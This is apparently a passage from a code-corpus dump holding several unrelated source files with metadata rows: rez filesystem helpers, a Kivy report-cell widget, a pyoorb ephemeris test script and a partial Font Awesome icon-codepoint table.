except OSError:
if not os.path.exists(path):
raise
def safe_remove(path):
"""Safely remove the given file or directory.
Works in a multithreaded scenario.
"""
if not os.path.exists(path):
return
try:
if os.path.isdir(path) and not os.path.islink(path):
shutil.rmtree(path)
else:
os.remove(path)
except OSError:
if os.path.exists(path):
raise
def forceful_rmtree(path):
"""Like shutil.rmtree, but may change permissions.
Specifically, non-writable dirs within `path` can cause rmtree to fail. This
func chmod's to writable to avoid this issue, if possible.
Also handled:
* path length over 259 char (on Windows)
* unicode path
"""
if six.PY2:
path = unicode(path)
def _on_error(func, path, exc_info):
try:
if is_windows:
path = windows_long_path(path)
parent_path = os.path.dirname(path)
if not os.access(parent_path, os.W_OK):
st = os.stat(parent_path)
os.chmod(parent_path, st.st_mode | stat.S_IWUSR)
if not os.access(path, os.W_OK):
st = os.stat(path)
os.chmod(path, st.st_mode | stat.S_IWUSR)
except:
# avoid confusion by ensuring original exception is reraised
pass
func(path)
shutil.rmtree(path, onerror=_on_error)
def replacing_symlink(source, link_name):
"""Create symlink that overwrites any existing target.
"""
with make_tmp_name(link_name) as tmp_link_name:
os.symlink(source, tmp_link_name)
replace_file_or_dir(link_name, tmp_link_name)
def replacing_copy(src, dest, follow_symlinks=False):
"""Perform copy that overwrites any existing target.
Will copy/copytree `src` to `dest`, and will remove `dest` if it exists,
regardless of what it is.
If `follow_symlinks` is False, symlinks are preserved, otherwise their
contents are copied.
Note that this behavior is different to `shutil.copy`, which copies src
into dest if dest is an existing dir.
"""
with make_tmp_name(dest) as tmp_dest:
if os.path.islink(src) and not follow_symlinks:
# special case - copy just a symlink
src_ = os.readlink(src)
os.symlink(src_, tmp_dest)
elif os.path.isdir(src):
# copy a dir
shutil.copytree(src, tmp_dest, symlinks=(not follow_symlinks))
else:
# copy a file
shutil.copy2(src, tmp_dest)
replace_file_or_dir(dest, tmp_dest)
def replace_file_or_dir(dest, source):
"""Replace `dest` with `source`.
Acts like an `os.rename` if `dest` does not exist. Otherwise, `dest` is
deleted and `src` is renamed to `dest`.
"""
from rez.vendor.atomicwrites import replace_atomic
if not os.path.exists(dest):
try:
os.rename(source, dest)
return
except:
if not os.path.exists(dest):
raise
try:
replace_atomic(source, dest)
return
except:
pass
with make_tmp_name(dest) as tmp_dest:
os.rename(dest, tmp_dest)
os.rename(source, dest)
def additive_copytree(src, dst, symlinks=False, ignore=None):
"""Version of `copytree` that merges into an existing directory.
"""
if not os.path.exists(dst):
os.makedirs(dst)
for item in os.listdir(src):
s = os.path.join(src, item)
d = os.path.join(dst, item)
if os.path.isdir(s):
additive_copytree(s, d, symlinks, ignore)
else:
shutil.copy2(s, d)
@contextmanager
def make_tmp_name(name):
"""Generates a tmp name for a file or dir.
This is a tempname that sits in the same dir as `name`. If it exists on
disk at context exit time, it is deleted.
"""
path, base = os.path.split(name)
# there's a reason this isn't a hidden file:
# https://github.com/nerdvegas/rez/pull/1088
#
tmp_base = "_tmp-%s-%s" % (base, uuid4().hex)
tmp_name = os.path.join(path, tmp_base)
try:
yield tmp_name
finally:
safe_remove(tmp_name)
def is_subdirectory(path_a, path_b):
"""Returns True if `path_a` is a subdirectory of `path_b`."""
path_a = os.path.realpath(path_a)
path_b = os.path.realpath(path_b)
try:
relative = os.path.relpath(path_a, path_b)
except ValueError:
# Different mounts on Windows:
# ValueError: path is on mount 'c:', start on mount 'd:'
#
return False
return not relative.startswith(os.pardir + os.sep)
def find_matching_symlink(path, source):
"""Find a symlink under `path` that points at `source`.
If source is relative, it is considered relative to `path`.
Returns:
str: Name of symlink found, or None.
"""
def to_abs(target):
if os.path.isabs(target):
return target
else:
return os.path.normpath(os.path.join(path, target))
abs_source = to_abs(source)
for name in os.listdir(path):
linkpath = os.path.join(path, name)
if os.path.islink(linkpath):
source_ = os.readlink(linkpath)
if to_abs(source_) == abs_source:
return name
return None
def copy_or_replace(src, dst):
'''try to copy with mode, and if it fails, try replacing
'''
try:
shutil.copy(src, dst)
except (OSError, IOError) as e:
# It's possible that the file existed, but was owned by someone
# else - in that situation, shutil.copy might then fail when it
# tries to copy perms.
# However, it's possible that we have write perms to the dir -
# in which case, we can just delete and replace
import errno
if e.errno == errno.EPERM:
import tempfile
# try copying into a temporary location beside the old
# file - if we have perms to do that, we should have perms
# to then delete the old file, and move the new one into
# place
if os.path.isdir(dst):
dst = os.path.join(dst, os.path.basename(src))
dst_dir, dst_name = os.path.split(dst)
dst_temp = tempfile.mktemp(prefix=dst_name + '.', dir=dst_dir)
shutil.copy(src, dst_temp)
if not os.path.isfile(dst_temp):
raise RuntimeError(
"shutil.copy completed successfully, but path"
" '%s' still did not exist" % dst_temp)
os.remove(dst)
shutil.move(dst_temp, dst)
def copytree(src, dst, symlinks=False, ignore=None, hardlinks=False):
'''copytree that supports hard-linking
'''
names = os.listdir(src)
if ignore is not None:
ignored_names = ignore(src, names)
else:
ignored_names = set()
if hardlinks:
def copy(srcname, dstname):
try:
# try hard-linking first
os.link(srcname, dstname)
except OSError:
shutil.copy2(srcname, dstname)
else:
copy = shutil.copy2
if not os.path.isdir(dst):
os.makedirs(dst)
errors = []
for name in names:
if name in ignored_names:
continue
srcname = os.path.join(src, name)
dstname = os.path.join(dst, name)
try:
if symlinks and os.path.islink(srcname):
linkto = os.readlink(srcname)
os.symlink(linkto, dstname)
elif os.path.isdir(srcname):
copytree(srcname, dstname, symlinks, ignore)
else:
copy(srcname, dstname)
# XXX What about devices, sockets etc.?
except (IOError, os.error) as why:
errors.append((srcname, dstname, str(why)))
# catch the Error from the recursive copytree so that we can
# continue with other files
except shutil.Error as err:
errors.extend(err.args[0])
try:
shutil.copystat(src, dst)
except shutil.WindowsError:
# can't copy file access times on Windows
pass
except OSError as why:
errors.extend((src, dst, str(why)))
if errors:
raise shutil.Error(errors)
def movetree(src, dst):
"""Attempts a move, and falls back to a copy+delete if this fails
"""
try:
shutil.move(src, dst)
except:
copytree(src, dst, symlinks=True, hardlinks=True)
shutil.rmtree(src)
def safe_chmod(path, mode):
"""Set the permissions mode on path, but only if it differs from the current mode.
"""
if stat.S_IMODE(os.stat(path).st_mode) != mode:
os.chmod(path, mode)
def to_nativepath(path):
path = path.replace('\\', '/')
return os.path.join(*path.split('/'))
def to_ntpath(path):
return ntpath.sep.join(path.split(posixpath.sep))
def to_posixpath(path):
return posixpath.sep.join(path.split(ntpath.sep))
def canonical_path(path, platform=None):
""" Resolves symlinks, and formats filepath.
Resolves symlinks, lowercases if filesystem is case-insensitive,
formats filepath using slashes appropriate for platform.
Args:
path (str): Filepath being formatted
platform (rez.utils.platform_.Platform): Indicates platform path is being
formatted for. Defaults to current platform.
Returns:
str: Provided path, formatted for platform.
"""
if platform is None:
platform = platform_
path = os.path.normpath(os.path.realpath(path))
if not platform.has_case_sensitive_filesystem:
return path.lower()
return path
def encode_filesystem_name(input_str):
"""Encodes an arbitrary unicode string to a generic filesystem-compatible
non-unicode filename.
The result after encoding will only contain the standard ascii lowercase
letters (a-z), the digits (0-9), or periods, underscores, or dashes
(".", "_", or "-"). No uppercase letters will be used, for
comaptibility with case-insensitive filesystems.
The rules for the encoding are:
1) Any lowercase letter, digit, period, or dash (a-z, 0-9, ., or -) is
encoded as-is.
2) Any underscore is encoded as a double-underscore ("__")
3) Any uppercase ascii letter (A-Z) is encoded as an underscore followed
by the corresponding lowercase letter (ie, "A" => "_a")
4) All other characters are encoded using their UTF-8 encoded unicode
representation, in the following format: "_NHH..., where:
a) N represents the number of bytes needed for the UTF-8 encoding,
except with N=0 for one-byte representation (the exception for N=1
is made both because it means that for "standard" ascii characters
in the range 0-127, their encoding will be _0xx, where xx is their
ascii hex code; and because it mirrors the ways UTF-8 encoding
itself works, where the number of bytes needed for the character can
be determined by counting the number of leading "1"s in the binary
representation of the character, except that if it is a 1-byte
sequence, there are 0 leading 1's).
b) HH represents the bytes of the corresponding UTF-8 encoding, in
hexadecimal (using lower-case letters)
As an example, the character "*", whose (hex) UTF-8 representation
of 2A, would be encoded as "_02a", while the "euro" symbol, which
has a UTF-8 representation of E2 82 AC, would be encoded as
"_3e282ac". (Note that, strictly speaking, the "N" part of the
encoding is redundant information, since it is essentially encoded
in the UTF-8 representation itself, but it makes the resulting
string more human-readable, and easier to decode).
As an example, the string "Foo_Bar (fun).txt" would get encoded as:
_foo___bar_020_028fun_029.txt
"""
if isinstance(input_str, six.string_types):
input_str = unicode(input_str)
elif not isinstance(input_str, unicode):
raise TypeError("input_str must be a %s" % six.string_types[0].__name__)
as_is = u'abcdefghijklmnopqrstuvwxyz0123456789.-'
uppercase = u'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
result = []
for char in input_str:
if char in as_is:
result.append(char)
elif char == u'_':
result.append('__')
elif char in uppercase:
result.append('_%s' % char.lower())
else:
utf8 = char.encode('utf8')
N = len(utf8)
if N == 1:
N = 0
HH = ''.join('%x' % ord(c) for c in utf8)
result.append('_%d%s' % (N, HH))
return ''.join(result)
_FILESYSTEM_TOKEN_RE = re.compile(r'(?P<as_is>[a-z0-9.-])|(?P<underscore>__)|_(?P<uppercase>[a-z])|_(?P<N>[0-9])')
_HEX_RE = re.compile('[0-9a-f]+$')
def decode_filesystem_name(filename):
"""Decodes a filename encoded using the rules given in encode_filesystem_name
to a unicode string.
"""
result = []
remain = filename
i = 0
while remain:
# use match, to ensure it matches from the start of the string...
match = _FILESYSTEM_TOKEN_RE.match(remain)
if not match:
raise ValueError("incorrectly encoded filesystem name %r"
" (bad index: %d - %r)" % (filename, i,
remain[:2]))
match_str = match.group(0)
match_len = len(match_str)
i += match_len
remain = remain[match_len:]
match_dict = match.groupdict()
if match_dict['as_is']:
result.append(unicode(match_str))
elif match_dict['underscore']:
result.append(u'_')
elif match_dict['uppercase']:
result.append(unicode(match_dict['uppercase'].upper()))
elif match_dict['N']:
N = int(match_dict['N'])
if N == 0:
N = 1
# hex-encoded, so need to grab 2*N chars
bytes_len = 2 * N
i += bytes_len
bytes = remain[:bytes_len]
remain = remain[bytes_len:]
# need this check to ensure that we don't end up eval'ing
# something nasty...
if not _HEX_RE.match(bytes):
raise ValueError("Bad utf8 encoding in name %r"
" (bad index: %d - %r)" % (filename, i, bytes))
bytes_repr = ''.join('\\x%s' % bytes[i:i + 2]
for i in xrange(0, bytes_len, 2))
bytes_repr = "'%s'" % bytes_repr
result.append(eval(bytes_repr).decode('utf8'))
else:
raise ValueError("Unrecognized match type in filesystem name %r"
" (bad index: %d - %r)" % (filename, i, remain[:2]))
return u''.join(result)
def test_encode_decode():
def do_test(orig, expected_encoded):
print('=' * 80)
print(orig)
encoded = encode_filesystem_name(orig)
print(encoded)
assert encoded == expected_encoded
decoded = decode_filesystem_name(encoded)
print(decoded)
assert decoded == orig
do_test("Foo_Bar (fun).txt", '_foo___bar_020_028fun_029.txt')
# u'\u20ac' == Euro symbol
do_test(u"\u20ac3 ~= $4.06", '_3e282ac3_020_07e_03d_020_0244.06')
def walk_up_dirs(path):
"""Yields absolute directories starting with the given path, and iterating
up through all it's parents, until it reaches a root directory"""
prev_path = None
current_path = os.path.abspath(path)
while current_path != prev_path:
yield current_path
prev_path = current_path
current_path = os.path.dirname(prev_path)
def windows_long_path(dos_path):
"""Prefix '\\?\' for path longer than 259 char (Win32API limitation)
"""
path = os.path.abspath(dos_path)
if path.startswith("\\\\?\\"):
pass
elif path.startswith("\\\\"):
path = "\\\\?\\UNC\\" + path[2:]
else:
path = "\\\\?\\" + path
return path
# Copyright 2013-2016 Allan Johns.
#
# This library is free software: you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation, either
# version 3 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library. If not, see <http://www.gnu.org/licenses/>.
| lgpl-3.0 | -2,403,405,377,951,893,000 | 28.677557 | 114 | 0.59441 | false |
victor-rene/kivy-test | gui/reportcell.py | 1 | 1576 | from kivy.graphics import Color, Rectangle
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.label import Label
from kivy.uix.widget import Widget
class ReportCell(BoxLayout):
def __init__(self, **kw):
super(ReportCell, self).__init__(**kw)
self.data = kw['data']
with self.canvas.before:
a = .5
b = .3
Color(b, a, b, 1.)
self.rect_run = Rectangle()
Color(a, b, b, 1.)
self.rect_miss = Rectangle()
Color(b, b, a, 1.)
self.rect_excl = Rectangle()
lbl = Label(size_hint=(1, 1))
lbl.text = '%s %s (%s/%s)' % (self.data[0], self.data[3], self.data[1],
self.data[2])
self.add_widget(lbl)
self.bind(pos=self._update_rect, size=self._update_rect)
def _update_rect(self, *args):
h = self.height
w = self.width
if float(self.data[1]) == 0.:
return
run_pct = (float(self.data[1]) - float(self.data[2])) / float(self.data[1])
miss_pct = float(self.data[2]) / float(self.data[1])
excl_pct = 1. - run_pct - miss_pct
# print run_pct, miss_pct, excl_pct
self.rect_run.pos = self.pos
self.rect_run.size = w * run_pct, h
self.rect_miss.pos = self.rect_run.pos[0] + self.rect_run.size[0], self.rect_run.pos[1]
self.rect_miss.size = w * miss_pct, h
self.rect_excl.pos = self.rect_miss.pos[0] + self.rect_miss.size[0], self.rect_miss.pos[1]
self.rect_excl.size = w * excl_pct, h
| mit | -8,431,501,857,110,692,000 | 36.547619 | 98 | 0.541244 | false |
EUPSForge/oorb | python/test_2.py | 1 | 4840 | import os
import subprocess
import numpy as np
import matplotlib.pyplot as plt
from itertools import repeat
import pandas as pd
import pyoorb as oo
import time
def dtime(time_prev):
return (time.time() - time_prev, time.time())
def pack_oorbArray(orbits):
"""Translate orbital element dictionary (easy for humans) into pyoorb-suitable input orbit array."""
# Translate orbital elements into array that pyoorb will like.
# PyOrb wants ::
# 0: orbitId
# 1 - 6: orbital elements, using radians for angles
# 7: element type code, where 2 = cometary - means timescale is TT, too
# 8: epoch
# 9: timescale for the epoch; 1= MJD_UTC, 2=UT1, 3=TT, 4=TAI
# 10: magHv
# 11: G
elem_type = np.zeros(len(orbits)) + 2
epoch_type = np.zeros(len(orbits)) + 3
gval = np.zeros(len(orbits)) + 0.15
# Also, the orbitID has to be a float, rather than a string, so substitute if needed.
if ((isinstance(orbits['objid'][0], float) == True) |
(isinstance(orbits['objid'][0], int) == True)):
orbids = orbits['objid']
else:
orbids = np.arange(0, len(orbits['objid']), 1)
# Convert to format for pyoorb, INCLUDING converting inclination, node, argperi to RADIANS
oorbArray = np.column_stack((orbids, orbits['q'], orbits['e'], np.radians(orbits['i']),
np.radians(orbits['node']), np.radians(orbits['argperi']),
orbits['t_p'], elem_type, orbits['t_0'], epoch_type, orbits['H'], gval))
return oorbArray
if __name__ == "__main__":
t = time.time()
print "starting..."
# check against OpenOrb command line
timespan = 1000
timestep = 10
command = "/bin/rm test_out ; oorb --code=807 --task=ephemeris --orb-in=test_orbits.des --timespan=%d --step=%d > test_out" %(timespan, timestep)
print command
subprocess.call(command, shell=True)
dt, t = dtime(t)
print "Calculating ephemerides by command line took %f s "%(dt)
# Read the command line version back, to look for differences.
data = pd.read_table('test_out', sep="\s*", engine='python')
dt, t = dtime(t)
print "Reading data back from file %f s" %(dt)
print "Read %d ephemerides" %(len(data['RA']))
ctimes = data['MJD_UTC/UT1'][data['#Designation'] == 1]
print "Created %d unique times; %d times total" %(len(np.unique(data['MJD_UTC/UT1'])), len(ctimes))
# Read the orbits from disk.
# Read the orbits from disk.
dt, t = dtime(t)
orbits = pd.read_table('test_orbits.des', sep='\s*', engine='python')
newcols = orbits.columns.values
newcols[0] = 'objid'
orbits.columns = newcols
dt, t = dtime(t)
print "Reading %d orbits required %f s" %(len(orbits['q']), dt)
# convert orbit array to 'packed' form needed in oorb.
oorbArray = pack_oorbArray(orbits)
# set up oorb.
ephfile = os.path.join(os.getenv('OORB_DATA'), 'de430.dat')
oo.pyoorb.oorb_init(ephemeris_fname=ephfile)
# set observatory code
obscode = 807
# Set up dates to predict ephemerides.
timestart = orbits['t_0'][0]
times = np.arange(timestart, timestart + timespan + timestep/2.0, timestep)
times = np.array(ctimes)
# For pyoorb, we need to tag times with timescales;
# 1= MJD_UTC, 2=UT1, 3=TT, 4=TAI
ephTimes = np.array(zip(times, repeat(1, len(times))), dtype='double')
print times
dt, t = dtime(t)
print "Ready for ephemeris generation .. %f s" %(dt)
# Generate ephemerides.
oorbephs, err = oo.pyoorb.oorb_ephemeris(in_orbits = oorbArray, in_obscode=obscode, in_date_ephems=ephTimes)
dt, t = dtime(t)
print "Calculating ephemerides by python required %f s" %(dt)
# Returned ephems contain a 3-D Fortran array of ephemerides, the axes are:
# [objid][time][ephemeris information element]
# the ephemeris information elements are (in order):
# distance, ra, dec, mag, ephem mjd, ephem mjd timescale, dradt(sky), ddecdt(sky)
# per object, per date, 8 elements (array shape is OBJ(s)/DATE(s)/VALUES)
# Note that ra/dec, dradt, etc. are all in DEGREES.
# First: (to arrange ephems for easier later use)
# Swap the order of the axes: DATE / Objs / values
# Unpack ephemerides.
times = np.ravel(oorbephs.swapaxes(0, 1).swapaxes(0, 2)[4])
ra = np.ravel(oorbephs.swapaxes(0, 1).swapaxes(0, 2)[1])
dec = np.ravel(oorbephs.swapaxes(0, 1).swapaxes(0, 2)[2])
radiff = data['RA'] - ra
decdiff = data['Dec'] - dec
radiff *= 3600
decdiff *= 3600
print "min/max ra offsets", radiff.min(), radiff.max()
print "min/max dec offsets", decdiff.min(), decdiff.max()
plt.figure()
plt.plot(radiff, decdiff, 'k.')
plt.xlabel('Difference in RA (arcsec)')
plt.ylabel('Difference in Dec (arcsec)')
#plt.show()
| gpl-3.0 | 2,614,545,079,291,372,500 | 37.412698 | 149 | 0.633884 | false |
diegomvh/pyqt | widgets/glyph/codepoints/fontawesome.py | 1 | 15278 | #!/usr/bin/env python
import sys
if sys.version_info[0] == 3:
unichr = chr
#A list of all icon-names with the codepoint (unicode-value) on the right
#You can use the names on the page http://fortawesome.github.io/Font-Awesome/design.html
_codepoints = [
("fa-adjust", 0xf042),
("fa-adn", 0xf170),
("fa-align-center", 0xf037),
("fa-align-justify", 0xf039),
("fa-align-left", 0xf036),
("fa-align-right", 0xf038),
("fa-ambulance", 0xf0f9),
("fa-anchor", 0xf13d),
("fa-android", 0xf17b),
("fa-angle-double-down", 0xf103),
("fa-angle-double-left", 0xf100),
("fa-angle-double-right", 0xf101),
("fa-angle-double-up", 0xf102),
("fa-angle-down", 0xf107),
("fa-angle-left", 0xf104),
("fa-angle-right", 0xf105),
("fa-angle-up", 0xf106),
("fa-apple", 0xf179),
("fa-archive", 0xf187),
("fa-arrow-circle-down", 0xf0ab),
("fa-arrow-circle-left", 0xf0a8),
("fa-arrow-circle-o-down", 0xf01a),
("fa-arrow-circle-o-left", 0xf190),
("fa-arrow-circle-o-right", 0xf18e),
("fa-arrow-circle-o-up", 0xf01b),
("fa-arrow-circle-right", 0xf0a9),
("fa-arrow-circle-up", 0xf0aa),
("fa-arrow-down", 0xf063),
("fa-arrow-left", 0xf060),
("fa-arrow-right", 0xf061),
("fa-arrow-up", 0xf062),
("fa-arrows", 0xf047),
("fa-arrows-alt", 0xf0b2),
("fa-arrows-h", 0xf07e),
("fa-arrows-v", 0xf07d),
("fa-asterisk", 0xf069),
("fa-automobile", 0xf1b9),
("fa-backward", 0xf04a),
("fa-ban", 0xf05e),
("fa-bank", 0xf19c),
("fa-bar-chart-o", 0xf080),
("fa-barcode", 0xf02a),
("fa-bars", 0xf0c9),
("fa-beer", 0xf0fc),
("fa-behance", 0xf1b4),
("fa-behance-square", 0xf1b5),
("fa-bell", 0xf0f3),
("fa-bell-o", 0xf0a2),
("fa-bitbucket", 0xf171),
("fa-bitbucket-square", 0xf172),
("fa-bitcoin", 0xf15a),
("fa-bold", 0xf032),
("fa-bolt", 0xf0e7),
("fa-bomb", 0xf1e2),
("fa-book", 0xf02d),
("fa-bookmark", 0xf02e),
("fa-bookmark-o", 0xf097),
("fa-briefcase", 0xf0b1),
("fa-btc", 0xf15a),
("fa-bug", 0xf188),
("fa-building", 0xf1ad),
("fa-building-o", 0xf0f7),
("fa-bullhorn", 0xf0a1),
("fa-bullseye", 0xf140),
("fa-cab", 0xf1ba),
("fa-calendar", 0xf073),
("fa-calendar-o", 0xf133),
("fa-camera", 0xf030),
("fa-camera-retro", 0xf083),
("fa-car", 0xf1b9),
("fa-caret-down", 0xf0d7),
("fa-caret-left", 0xf0d9),
("fa-caret-right", 0xf0da),
("fa-caret-square-o-down", 0xf150),
("fa-caret-square-o-left", 0xf191),
("fa-caret-square-o-right", 0xf152),
("fa-caret-square-o-up", 0xf151),
("fa-caret-up", 0xf0d8),
("fa-certificate", 0xf0a3),
("fa-chain", 0xf0c1),
("fa-chain-broken", 0xf127),
("fa-check", 0xf00c),
("fa-check-circle", 0xf058),
("fa-check-circle-o", 0xf05d),
("fa-check-square", 0xf14a),
("fa-check-square-o", 0xf046),
("fa-chevron-circle-down", 0xf13a),
("fa-chevron-circle-left", 0xf137),
("fa-chevron-circle-right", 0xf138),
("fa-chevron-circle-up", 0xf139),
("fa-chevron-down", 0xf078),
("fa-chevron-left", 0xf053),
("fa-chevron-right", 0xf054),
("fa-chevron-up", 0xf077),
("fa-child", 0xf1ae),
("fa-circle", 0xf111),
("fa-circle-o", 0xf10c),
("fa-circle-o-notch", 0xf1ce),
("fa-circle-thin", 0xf1db),
("fa-clipboard", 0xf0ea),
("fa-clock-o", 0xf017),
("fa-cloud", 0xf0c2),
("fa-cloud-download", 0xf0ed),
("fa-cloud-upload", 0xf0ee),
("fa-cny", 0xf157),
("fa-code", 0xf121),
("fa-code-fork", 0xf126),
("fa-codepen", 0xf1cb),
("fa-coffee", 0xf0f4),
("fa-cog", 0xf013),
("fa-cogs", 0xf085),
("fa-columns", 0xf0db),
("fa-comment", 0xf075),
("fa-comment-o", 0xf0e5),
("fa-comments", 0xf086),
("fa-comments-o", 0xf0e6),
("fa-compass", 0xf14e),
("fa-compress", 0xf066),
("fa-copy", 0xf0c5),
("fa-credit-card", 0xf09d),
("fa-crop", 0xf125),
("fa-crosshairs", 0xf05b),
("fa-css3", 0xf13c),
("fa-cube", 0xf1b2),
("fa-cubes", 0xf1b3),
("fa-cut", 0xf0c4),
("fa-cutlery", 0xf0f5),
("fa-dashboard", 0xf0e4),
("fa-database", 0xf1c0),
("fa-dedent", 0xf03b),
("fa-delicious", 0xf1a5),
("fa-desktop", 0xf108),
("fa-deviantart", 0xf1bd),
("fa-digg", 0xf1a6),
("fa-dollar", 0xf155),
("fa-dot-circle-o", 0xf192),
("fa-download", 0xf019),
("fa-dribbble", 0xf17d),
("fa-dropbox", 0xf16b),
("fa-drupal", 0xf1a9),
("fa-edit", 0xf044),
("fa-eject", 0xf052),
("fa-ellipsis-h", 0xf141),
("fa-ellipsis-v", 0xf142),
("fa-empire", 0xf1d1),
("fa-envelope", 0xf0e0),
("fa-envelope-o", 0xf003),
("fa-envelope-square", 0xf199),
("fa-eraser", 0xf12d),
("fa-eur", 0xf153),
("fa-euro", 0xf153),
("fa-exchange", 0xf0ec),
("fa-exclamation", 0xf12a),
("fa-exclamation-circle", 0xf06a),
("fa-exclamation-triangle", 0xf071),
("fa-expand", 0xf065),
("fa-external-link", 0xf08e),
("fa-external-link-square", 0xf14c),
("fa-eye", 0xf06e),
("fa-eye-slash", 0xf070),
("fa-facebook", 0xf09a),
("fa-facebook-square", 0xf082),
("fa-fast-backward", 0xf049),
("fa-fast-forward", 0xf050),
("fa-fax", 0xf1ac),
("fa-female", 0xf182),
("fa-fighter-jet", 0xf0fb),
("fa-file", 0xf15b),
("fa-file-archive-o", 0xf1c6),
("fa-file-audio-o", 0xf1c7),
("fa-file-code-o", 0xf1c9),
("fa-file-excel-o", 0xf1c3),
("fa-file-image-o", 0xf1c5),
("fa-file-movie-o", 0xf1c8),
("fa-file-o", 0xf016),
("fa-file-pdf-o", 0xf1c1),
("fa-file-photo-o", 0xf1c5),
("fa-file-picture-o", 0xf1c5),
("fa-file-powerpoint-o", 0xf1c4),
("fa-file-sound-o", 0xf1c7),
("fa-file-text", 0xf15c),
("fa-file-text-o", 0xf0f6),
("fa-file-video-o", 0xf1c8),
("fa-file-word-o", 0xf1c2),
("fa-file-zip-o", 0xf1c6),
("fa-files-o", 0xf0c5),
("fa-film", 0xf008),
("fa-filter", 0xf0b0),
("fa-fire", 0xf06d),
("fa-fire-extinguisher", 0xf134),
("fa-flag", 0xf024),
("fa-flag-checkered", 0xf11e),
("fa-flag-o", 0xf11d),
("fa-flash", 0xf0e7),
("fa-flask", 0xf0c3),
("fa-flickr", 0xf16e),
("fa-floppy-o", 0xf0c7),
("fa-folder", 0xf07b),
("fa-folder-o", 0xf114),
("fa-folder-open", 0xf07c),
("fa-folder-open-o", 0xf115),
("fa-font", 0xf031),
("fa-forward", 0xf04e),
("fa-foursquare", 0xf180),
("fa-frown-o", 0xf119),
("fa-gamepad", 0xf11b),
("fa-gavel", 0xf0e3),
("fa-gbp", 0xf154),
("fa-ge", 0xf1d1),
("fa-gear", 0xf013),
("fa-gears", 0xf085),
("fa-gift", 0xf06b),
("fa-git", 0xf1d3),
("fa-git-square", 0xf1d2),
("fa-github", 0xf09b),
("fa-github-alt", 0xf113),
("fa-github-square", 0xf092),
("fa-gittip", 0xf184),
("fa-glass", 0xf000),
("fa-globe", 0xf0ac),
("fa-google", 0xf1a0),
("fa-google-plus", 0xf0d5),
("fa-google-plus-square", 0xf0d4),
("fa-graduation-cap", 0xf19d),
("fa-group", 0xf0c0),
("fa-h-square", 0xf0fd),
("fa-hacker-news", 0xf1d4),
("fa-hand-o-down", 0xf0a7),
("fa-hand-o-left", 0xf0a5),
("fa-hand-o-right", 0xf0a4),
("fa-hand-o-up", 0xf0a6),
("fa-hdd-o", 0xf0a0),
("fa-header", 0xf1dc),
("fa-headphones", 0xf025),
("fa-heart", 0xf004),
("fa-heart-o", 0xf08a),
("fa-history", 0xf1da),
("fa-home", 0xf015),
("fa-hospital-o", 0xf0f8),
("fa-html5", 0xf13b),
("fa-image", 0xf03e),
("fa-inbox", 0xf01c),
("fa-indent", 0xf03c),
("fa-info", 0xf129),
("fa-info-circle", 0xf05a),
("fa-inr", 0xf156),
("fa-instagram", 0xf16d),
("fa-institution", 0xf19c),
("fa-italic", 0xf033),
("fa-joomla", 0xf1aa),
("fa-jpy", 0xf157),
("fa-jsfiddle", 0xf1cc),
("fa-key", 0xf084),
("fa-keyboard-o", 0xf11c),
("fa-krw", 0xf159),
("fa-language", 0xf1ab),
("fa-laptop", 0xf109),
("fa-leaf", 0xf06c),
("fa-legal", 0xf0e3),
("fa-lemon-o", 0xf094),
("fa-level-down", 0xf149),
("fa-level-up", 0xf148),
("fa-life-bouy", 0xf1cd),
("fa-life-ring", 0xf1cd),
("fa-life-saver", 0xf1cd),
("fa-lightbulb-o", 0xf0eb),
("fa-link", 0xf0c1),
("fa-linkedin", 0xf0e1),
("fa-linkedin-square", 0xf08c),
("fa-linux", 0xf17c),
("fa-list", 0xf03a),
("fa-list-alt", 0xf022),
("fa-list-ol", 0xf0cb),
("fa-list-ul", 0xf0ca),
("fa-location-arrow", 0xf124),
("fa-lock", 0xf023),
("fa-long-arrow-down", 0xf175),
("fa-long-arrow-left", 0xf177),
("fa-long-arrow-right", 0xf178),
("fa-long-arrow-up", 0xf176),
("fa-magic", 0xf0d0),
("fa-magnet", 0xf076),
("fa-mail-forward", 0xf064),
("fa-mail-reply", 0xf112),
("fa-mail-reply-all", 0xf122),
("fa-male", 0xf183),
("fa-map-marker", 0xf041),
("fa-maxcdn", 0xf136),
("fa-medkit", 0xf0fa),
("fa-meh-o", 0xf11a),
("fa-microphone", 0xf130),
("fa-microphone-slash", 0xf131),
("fa-minus", 0xf068),
("fa-minus-circle", 0xf056),
("fa-minus-square", 0xf146),
("fa-minus-square-o", 0xf147),
("fa-mobile", 0xf10b),
("fa-mobile-phone", 0xf10b),
("fa-money", 0xf0d6),
("fa-moon-o", 0xf186),
("fa-mortar-board", 0xf19d),
("fa-music", 0xf001),
("fa-navicon", 0xf0c9),
("fa-openid", 0xf19b),
("fa-outdent", 0xf03b),
("fa-pagelines", 0xf18c),
("fa-paper-plane", 0xf1d8),
("fa-paper-plane-o", 0xf1d9),
("fa-paperclip", 0xf0c6),
("fa-paragraph", 0xf1dd),
("fa-paste", 0xf0ea),
("fa-pause", 0xf04c),
("fa-paw", 0xf1b0),
("fa-pencil", 0xf040),
("fa-pencil-square", 0xf14b),
("fa-pencil-square-o", 0xf044),
("fa-phone", 0xf095),
("fa-phone-square", 0xf098),
("fa-photo", 0xf03e),
("fa-picture-o", 0xf03e),
("fa-pied-piper", 0xf1a7),
("fa-pied-piper-alt", 0xf1a8),
("fa-pied-piper-square", 0xf1a7),
("fa-pinterest", 0xf0d2),
("fa-pinterest-square", 0xf0d3),
("fa-plane", 0xf072),
("fa-play", 0xf04b),
("fa-play-circle", 0xf144),
("fa-play-circle-o", 0xf01d),
("fa-plus", 0xf067),
("fa-plus-circle", 0xf055),
("fa-plus-square", 0xf0fe),
("fa-plus-square-o", 0xf196),
("fa-power-off", 0xf011),
("fa-print", 0xf02f),
("fa-puzzle-piece", 0xf12e),
("fa-qq", 0xf1d6),
("fa-qrcode", 0xf029),
("fa-question", 0xf128),
("fa-question-circle", 0xf059),
("fa-quote-left", 0xf10d),
("fa-quote-right", 0xf10e),
("fa-ra", 0xf1d0),
("fa-random", 0xf074),
("fa-rebel", 0xf1d0),
("fa-recycle", 0xf1b8),
("fa-reddit", 0xf1a1),
("fa-reddit-square", 0xf1a2),
("fa-refresh", 0xf021),
("fa-renren", 0xf18b),
